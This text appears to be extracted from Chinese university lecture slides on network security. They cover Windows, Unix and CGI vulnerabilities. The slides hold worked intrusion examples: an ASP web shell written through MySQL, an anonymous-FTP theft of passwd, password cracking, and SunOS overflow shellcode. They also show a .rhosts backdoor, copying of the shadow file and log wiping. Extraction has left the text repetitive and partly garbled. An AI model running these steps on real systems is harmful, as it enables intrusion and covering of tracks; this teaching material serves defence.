1、網(wǎng)絡安全羅羅 敏敏 武漢大學計算機學院武漢大學計算機學院第第7章章 欺騙攻擊欺騙攻擊 重點回顧重點回顧l7.1 DNS欺騙攻擊 l7.2 Email欺騙攻擊 l7.3 Web欺騙攻擊 l7.4 IP欺騙攻擊 第第8章章 利用處理程序錯誤的攻擊利用處理程序錯誤的攻擊l利用處理程序的錯誤對系統(tǒng)進行攻擊是黑客們慣用的手段之一。l本章主要從以下兩個角度來探討漏洞及針對漏洞的攻防：操作系統(tǒng)的漏洞及攻防和Web漏洞及攻防。第第8章章 利用處理程序錯誤的攻擊利用處理程序錯誤的攻擊l8.1 系統(tǒng)漏洞及攻防 l8.2 Web漏洞及攻防8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防lWindows的經(jīng)典漏洞l輸入法登錄漏洞

2、 l遠程過程調(diào)用（RPC）漏洞第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防lUPnP拒絕服務漏洞l通用即插即用(UPnP)服務使計算機能夠發(fā)現(xiàn)和使用基于網(wǎng)絡的設備。Windows ME和XP自帶UPnP服務；l由于UPnP服務不能正確地處理某種類型的無效請求，因此產(chǎn)生了一個安全漏洞。Windows98、98SE和ME系統(tǒng)在接收到這樣的一個請求之后會崩潰；lWindows XP系統(tǒng)受到的影響沒有那么嚴重，因為XP系統(tǒng)每次接收到這樣的一個請求時，就會有一小部分系統(tǒng)內(nèi)存無法使用，如果這種情況重復發(fā)生，就會耗盡系統(tǒng)資源，使性能降低，甚至完全終止 第第8 8章章 第第1 1節(jié)節(jié)8.

3、1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l其它Windows漏洞lXP的熱鍵漏洞lWindows Redirector lshimgvw.dll溢出 l幫助支持中心接口欺騙 l不安全的腳本l。第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防lWindows的防護l系統(tǒng)補丁 lInternet連接防火墻l支持多用戶的加密文件系統(tǒng)l改進的訪問控制l對智能卡的支持 l。第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防lUnix漏洞l處理畸形ELF lptrace lSamba l惠普的Tru64Unix (Ipsec,SSH )l。第第8 8章章 第第1 1節(jié)節(jié)8.1 系

4、統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊MySQL實例F:cmdmysql -u root -h Welcome to the MySQL monitor. Commands end with ; or g.Your MySQL connection id is 3038 to server version: 3.23.21-betaType help; or h for help. Type c to clear the buffermysql第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊MySQL實例Mysql use test;create table tmp（str

5、TEXT）;Database changedQuery OK, 0 rows affected （0.05 sec）Mysql load data infile d:wwwgbaboutabout.htm into table tmp;Query OK, 235 rows affected （0.05 sec）Records: 235 Deleted: 0 Skipped: 0 Warnings: 0第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊MySQL實例Mysql use test;create table cmd（str TEXT）;Database chan

6、gedQuery OK, 0 rows affected （0.05 sec）Mysql insert into cmd values（asp代碼代碼）;第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防% Dim oScriptDim oScriptNet Dim oFileSys, oFileDim szCMD, szTempFileOn Error Resume NextSet oScript = Server.CreateObject(WSCRIPT.SHELL)Set oScriptNet = Server.CreateObject(WSCRIPT.NETWORK)S

7、et oFileSys = Server.CreateObject(Scripting.FileSystemObject) szCMD = Request.Form(.CMD) If (szCMD ) ThenszTempFile = C: & oFileSys.GetTempName() Call oScript.Run (cmd.exe /c & szCMD & ) & szTempFile, 0, True Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %FORM ac

8、tion= method=POSTinput type=text name=.CMD size=45 value=第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊MySQL實例mysql use test; drop table tmp; drop table cmd;Mysql select * from cmd into outfile d:wwwgbaboucmd.asp;http:/ 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例bash# telnet 17Red Hat Linux release 6.2

9、(Goozer) Kernel 2.2.14-5.0 on an i686 login:crossbowpassword:bash$ 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例bash$ telnet SunOS 5.6login: 用用messala掃描一下看有沒有掃描一下看有沒有CGI漏洞漏洞 用用nss看看它開了什么服務看看它開了什么服務 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例bash$ ftp Connected to .220 Co

10、ol FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.Name(:FakeName):anonymous331 Guest login ok,send you complete e-mail address as password.Password:230:Welcome,archive user!ftp 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例ftplsbin boot etc dev home lib usr proc lost+found root sbi

11、n src tmp usr varftpcd /etcftpls *passwd*passwd passwd- ftpls *shadow*shadow shadow-第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例ftpget passwd226 Transfer complete.540 bytes received in 0.55 seconds (1.8Kbytes/s)ftpbye221 Goodbye.bash$第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例bash$ finger b

12、ash$ finger LoginLoginNameNameTTYTTYIdleIdleWhenWhenWhere Where daemondaemon? binbin ? syssys ? walterwalterWalter WanWalter Wan pts/0pts/01414dennisdennisDennis LeeDennis Lee437437 powerpower Power XiongPower Xiong0 000

13、dealdealH WangH Wang pts/2pts/211adminadmin ? jessicajessicaJessica XiaoJessica Xiaopts/0pts/0smithsmithSmith LiuSmith Liu pts/0pts/033renderrender RenderRenderpts/0pts/01717ftpftp ? 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系

14、統(tǒng)漏洞及攻防l攻擊Unix實例bash$ got! -n xiong Powerbash$ got! -n xiong PowerAttempting.Attempting.Bingo!Bingo!The password of user power is xiong99! Good luck!The password of user power is xiong99! Good luck!bash$ bash$ 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例bash$ telnet b

15、ash$ telnet SunOS 5.6SunOS 5.6login:powerlogin:powerpassword:password:Last login: Sun Dec 2 13:21:55 CDT 2001 from 0Last login: Sun Dec 2 13:21:55 CDT 2001 from 0Sun Microsystems Inc. SunOS 5.6Sun Microsystems Inc. SunOS 5.6You have mail. You have mail. 第第8 8章章 第第1 1

16、節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例$ w$ w13:07pm up 61 day(s), 3 users, 13:07pm up 61 day(s), 3 users, User tty login idle JCPU PCPU what User tty login idle JCPU PCPU what root pts/0 11:49am tail -f syslog root pts/0 11:49am tail -f syslog smith pts/5 12:13pmls -l smith pts/5 12:13pmls -l * *.c.cpower pt

17、s/7 13:07pm w power pts/7 13:07pm w 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例$ uname -a$ uname -aSunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10 SunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10 $ set$ setHOME=/export/home/powerHOME=/export/home/powerHZ=100 HZ=100 IFS= IFS

18、= LOGNAME=powerLOGNAME=powerMAIL=/var/mail/power MAIL=/var/mail/power MAILCHECK=600 MAILCHECK=600 OPTIND=1 OPTIND=1 PATH=/usr/bin: PATH=/usr/bin: PS1=$ PS1=$ PS2= PS2= SHELL=/bin/sh SHELL=/bin/sh TERM=ansi TERM=ansi TZ=China TZ=China 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例$ gcc$ gccgcc: No input

19、files. gcc: No input files. $ cd$ cd$ pwd$ pwd$ /export/home/power$ /export/home/power$ mkdir .$ mkdir .$ cd .$ cd .$ vi ./.of.c $ vi ./.of.c 第第8 8章章 第第1 1節(jié)節(jié)file:/Here is the C source code for overflow in SunOS.#define NOPNUM 4000 #define ADRNUM 1200 #define ALLIGN 3 char shellcode= x20 xbfxffxff /*

20、 bn,a */ x20 xbfxffxff /* bn,a */ x7fxffxffxff /* call */ x90 x03xe0 x20 /* add %o7,32,%o0 */ x92x02x20 x10 /* add %o0,16,%o1 */ xc0 x22x20 x08 /* st %g0,%o0+8 */ xd0 x22x20 x10 /* st %o0,%o0+16 */ xc0 x22x20 x14 /* st %g0,%o0+20 */ x82x10 x20 x0b /* mov 0 xb,%g1 */ x91xd0 x20 x08 /* ta 8 */ /bin/ks

21、h; char jump= x81xc3xe0 x08 /* jmp %o7+8 */ x90 x10 x00 x0e; /* mov %sp,%o0 */ 第第8 8章章 第第1 1節(jié)節(jié)static char nop=x80 x1cx40 x11; main(int argc,char *argv) char buffer10000,adr4,*b,*envp2; int i; printf(copyright LAST STAGE OF DELIRIUM dec 1999 poland file:/lsd- printf(/usr/lib/lp/bin/netpr solaris 2.7

22、sparcnn); if(argc=1) printf(usage: %s lpservern,argv0); exit(-1); *(unsigned long*)adr)=(*(unsigned long(*)()jump)()+7124+2000; envp0=&buffer0; envp1=0; b=&buffer0; sprintf(b,xxx=); b+=4; for(i=0;i1+4-(strlen(argv1)%4);i+) *b+=0 xff; for(i=0;i1+4-(strlen(argv1)%4);i+) *b=0; b=&buffer5000

23、; for(i=0;i./.rhosts# echo + ./.rhosts# ls # ls l l .rhosts .rhosts # # 第第8 8章章 第第1 1節(jié)節(jié)# cp /etc/shadow /export/home/power/./.s# chmod 666 /export/home/power/./.s# exit$ exitbash$bash$ ftp Connected to .220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.Name(202

24、.202.0.8:FakeName):power331 Guest login ok,send you complete e-mail address as password.Password:230:Welcome,power!ftplsftpcd .ftpls -l.zsh .sftpget .s226 Transfer complete.540 bytes received in 0.55 seconds (1.8Kbytes/s)ftpbye221 Goodbye.bash$ 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例bash$ telnet

25、bash$ telnet SunOS 5.6SunOS 5.6login:powerlogin:powerpassword:password:Last login: Mon Dec 8 13:21:15 CDT 2001 from 17Last login: Mon Dec 8 13:21:15 CDT 2001 from 17Sun Microsystems Inc. SunOS 5.6Sun Microsystems Inc. SunOS 5.6$ /usr/man/man1/./.zsh$ /usr/

26、man/man1/./.zsh# whoami# whoamirootroot# # 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例# telnet localhost# telnet localhostTrying . Trying . Connected to localhost. Connected to localhost. Escape character is . Escape character is . SunOS 5.6 SunOS 5.6 login: powerlogin: powerPasswor

27、d: Password: Last login: Mon Dec 8 13:21:55 CDT 2001 from Last login: Mon Dec 8 13:21:55 CDT 2001 from Sun Microsystems Inc. SunOS 5.6 Generic August 1997 Sun Microsystems Inc. SunOS 5.6 Generic August 1997 You have mail. You have mail. $ exit $ exit Connection closed by foreig

28、n host. Connection closed by foreign host. # # 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻防l攻擊Unix實例chmod +x ./cleaner.shchmod +x ./cleaner.sh#./cleaner.sh power#./cleaner.sh powerLog cleaner v0.5b By: Tragedy/Dor OSLog cleaner v0.5b By: Tragedy/Dor OSdetection. detection. Detected SunOS Detected SunOS Log cle

29、aning in process. Log cleaning in process. * * Cleaning aculog ( 0 lines).0 lines removed! Cleaning aculog ( 0 lines).0 lines removed! * * Cleaning lastlog ( 19789 lines).45 lines removed! Cleaning lastlog ( 19789 lines).45 lines removed! * * Cleaning messages ( 12 lines).1 lines removed! Cleaning m

30、essages ( 12 lines).1 lines removed! * * Cleaning messages.0 ( 12 lines).0 lines removed! Cleaning messages.0 ( 12 lines).0 lines removed! * * Cleaning syslog.2 ( 39 lines).0 lines removed! Cleaning syslog.2 ( 39 lines).0 lines removed! * * Cleaning syslog.3 ( 5 lines).0 lines removed! Cleaning sysl

31、og.3 ( 5 lines).0 lines removed! * * Cleaning syslog.4 ( 3 lines).0 lines removed! Cleaning syslog.4 ( 3 lines).0 lines removed! * * Cleaning syslog.5 ( 210 lines).0 lines removed! Cleaning syslog.5 ( 210 lines).0 lines removed! # ./cleaner.sh root# ./cleaner.sh root 第第8 8章章 第第1 1節(jié)節(jié)8.1 系統(tǒng)漏洞及攻防系統(tǒng)漏洞及攻

32、防l入侵總結l黑客的攻擊按如下六個步驟進行：l收集資料 l取得普通用戶的權限 l遠程登錄 l取得超級用戶的權限 l留下后門 l清除日志第第8 8章章 第第1 1節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lWeb入侵lWeb入侵就是利用Web的安全漏洞進行攻擊，使Web服務器無法正常工作，甚至癱瘓，影響網(wǎng)站正常地為網(wǎng)絡用戶提供服務 l以Web入侵作為跳板來進行其他形式的攻擊，對網(wǎng)絡系統(tǒng)造成更嚴重的破壞 網(wǎng)絡管理員通常為了防止網(wǎng)絡遭受入侵，就將網(wǎng)絡管理員通常為了防止網(wǎng)絡遭受入侵，就將可能導致攻擊的端口全部關閉，但可能導致攻擊的端口全部關閉，但WebWeb服務器的服務器的8080端口必須打開，這樣就給了

33、黑客以可乘之機端口必須打開，這樣就給了黑客以可乘之機 第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lWeb的三種安全問題l服務器向公眾提供了不應該提供的服務 l服務器把本應私有的數(shù)據(jù)放到了公開訪問的區(qū)域 l服務器信賴了來自不可信賴數(shù)據(jù)源的數(shù)據(jù) 第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lWeb安全問題的來源l管理員為了管理方便而設立遠程管理功能l為了方便用戶使用而設立上傳/下載機制l由于疏忽而缺乏應有的安全檢查l為了省錢而使用不足夠安全的軟件和硬件第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防l常見Web安全問題l物理路徑泄露lCGI

34、源代碼泄露l目錄遍歷l執(zhí)行任意命令l緩沖區(qū)溢出l拒絕服務l。第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lCGIl公共網(wǎng)關接口 l它在Web服務器上定義了Web客戶請求與應答的一種方式，是外部擴展應用程序與WWW服務器交互的一個標準接口 CGI的安全性 Web服務器的安全 CGI語言的安全 第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lCGI的安全問題l暴露敏感或不敏感信息。l缺省提供的某些正常服務未關閉。l利用某些服務的漏洞執(zhí)行命令。l應用程序存在遠程溢出。l非通用CGI程序的編程漏洞。第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防l

35、CGI的漏洞 l配置錯誤 l安裝完CGI程序后沒有刪除安裝腳本，這樣攻擊者就可能遠程重置數(shù)據(jù) l邊界條件錯誤 lC語言編寫的CGI l訪問驗證錯誤 l安全的驗證：賬號和密碼，Session認證 l不安全的驗證：Userid ，Cookie 第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lCGI的漏洞 l來源驗證錯誤 l利用CGI程序沒有對文章的來源進行驗證，從而不間斷的發(fā)文章，最后導致服務器硬盤充滿而掛起 l輸入驗證錯誤 l沒有過濾“%20”造成的畸形注冊l沒有過濾“./”經(jīng)常造成泄露系統(tǒng)文件l沒有過濾“$”經(jīng)常導致泄露網(wǎng)頁中的敏感信息l沒有過濾“;”經(jīng)常導致執(zhí)行任意系統(tǒng)指令

36、l沒有過濾“|”或“t”經(jīng)常導致文本文件攻擊l沒有過濾“”和“#”經(jīng)常導致SQL數(shù)據(jù)庫攻擊l沒有過濾“”導致的Cross-Site Scripting攻擊 l第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lCGI的漏洞 l異常情況處理失敗 l沒有檢查文件是否存在就直接打開設備文件導致拒絕服務，l沒有檢查文件是否存在就打開文件提取內(nèi)容進行比較而繞過驗證 l策略錯誤 l原始密碼生成機制脆弱導致窮舉密碼導致在Cookie中明文存放賬號密碼導致敏感信息泄露l使用與CGI程序不同的擴展名擴展名存儲敏感信息導致該文件被直接下載l丟失密碼模塊在確認用戶身份之后直接讓用戶修改密碼而不是把密碼發(fā)到用戶的注冊信箱l登錄時采用賬號和加密后的密碼進行認證導致攻擊者不需要知道用戶的原始密碼就能夠登錄l第第8 8章章 第第2 2節(jié)節(jié)8.2 Web漏洞及攻防漏洞及攻防lCGI的漏洞 l習慣問題 l使用某些文本編輯器修改CGI程序時，經(jīng)常會生成“.bak”文件，如果程序員編輯完后沒有刪除這些備份文件，則可能導致CGI源代碼泄露l如果程序員總喜歡把一些敏感信息（如賬號密碼）放在CGI文件中的話，只要攻擊者對該CGI